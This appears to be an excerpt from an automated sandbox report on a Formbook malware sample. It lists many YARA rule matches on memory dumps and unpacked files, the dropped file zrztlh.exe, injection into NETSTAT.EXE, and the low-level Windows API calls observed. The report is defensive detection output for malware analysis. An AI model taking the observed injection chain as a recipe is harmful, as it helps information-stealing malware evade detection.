          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: O1ySvN9SvL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004032FA
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_004047EE0_2_004047EE
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_004060830_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC1A6F1_2_00EC1A6F
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC02761_2_00EC0276
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC4CC41_2_00EC4CC4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EBAC141_2_00EBAC14
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC2D971_2_00EC2D97
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC0D531_2_00EC0D53
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC36591_2_00EC3659
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EC07E11_2_00EC07E1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB5FCE1_2_00EB5FCE
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041D85E2_2_0041D85E
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041E1B12_2_0041E1B1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041EC252_2_0041EC25
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00409E5D2_2_00409E5D
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00409E1A2_2_00409E1A
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC1A6F2_2_00EC1A6F
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC02762_2_00EC0276
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC4CC42_2_00EC4CC4
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EBAC142_2_00EBAC14
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC2D972_2_00EC2D97
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC0D532_2_00EC0D53
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC36592_2_00EC3659
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EC07E12_2_00EC07E1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_00EB5FCE2_2_00EB5FCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03422B2810_2_03422B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338EBB010_2_0338EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341DBD210_2_0341DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03421FF110_2_03421FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03376E3010_2_03376E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03422EF710_2_03422EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034222AE10_2_034222AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03350D2010_2_03350D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03421D5510_2_03421D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337412010_2_03374120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335F90010_2_0335F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03422D0710_2_03422D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338258110_2_03382581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336D5E010_2_0336D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336841F10_2_0336841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0341100210_2_03411002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A010_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B09010_2_0336B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034220A810_2_034220A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DD85E10_2_007DD85E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DEC2510_2_007DEC25
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C2D9010_2_007C2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C2D8710_2_007C2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C9E6010_2_007C9E60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C9E5D10_2_007C9E5D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C9E1A10_2_007C9E1A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007C2FB010_2_007C2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0335B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: String function: 00EAF1E0 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: String function: 00EB2233 appears 43 times
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A330 NtCreateFile,2_2_0041A330
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A3E0 NtReadFile,2_2_0041A3E0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A460 NtClose,2_2_0041A460
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A510 NtAllocateVirtualMemory,2_2_0041A510
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A32A NtCreateFile,2_2_0041A32A
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A3DB NtReadFile,2_2_0041A3DB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 2_2_0041A45A NtClose,2_2_0041A45A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399710 NtQueryInformationToken,LdrInitializeThunk,10_2_03399710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399780 NtMapViewOfSection,LdrInitializeThunk,10_2_03399780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399FE0 NtCreateMutant,LdrInitializeThunk,10_2_03399FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03399660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399A50 NtCreateFile,LdrInitializeThunk,10_2_03399A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399650 NtQueryValueKey,LdrInitializeThunk,10_2_03399650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033996E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_033996E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033996D0 NtCreateKey,LdrInitializeThunk,10_2_033996D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_03399910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399540 NtReadFile,LdrInitializeThunk,10_2_03399540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033999A0 NtCreateSection,LdrInitializeThunk,10_2_033999A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033995D0 NtClose,LdrInitializeThunk,10_2_033995D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399860 NtQuerySystemInformation,LdrInitializeThunk,10_2_03399860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399840 NtDelayExecution,LdrInitializeThunk,10_2_03399840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399730 NtQueryVirtualMemory,10_2_03399730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339A710 NtOpenProcessToken,10_2_0339A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399B00 NtSetValueKey,10_2_03399B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399770 NtSetInformationFile,10_2_03399770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339A770 NtOpenThread,10_2_0339A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399760 NtOpenProcess,10_2_03399760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339A3B0 NtGetContextThread,10_2_0339A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033997A0 NtUnmapViewOfSection,10_2_033997A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399A20 NtResumeThread,10_2_03399A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399610 NtEnumerateValueKey,10_2_03399610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399A10 NtQuerySection,10_2_03399A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399A00 NtProtectVirtualMemory,10_2_03399A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399670 NtQueryInformationProcess,10_2_03399670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399A80 NtOpenDirectoryObject,10_2_03399A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339AD30 NtSetContextThread,10_2_0339AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399520 NtWaitForSingleObject,10_2_03399520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399560 NtWriteFile,10_2_03399560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399950 NtQueueApcThread,10_2_03399950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033995F0 NtQueryInformationFile,10_2_033995F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033999D0 NtCreateProcessEx,10_2_033999D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03399820 NtEnumerateKey,10_2_03399820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0339B040 NtSuspendThread,10_2_0339B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033998A0 NtWriteVirtualMemory,10_2_033998A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033998F0 NtReadVirtualMemory,10_2_033998F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_007DA330 NtCreateFile,10_2_007DA330
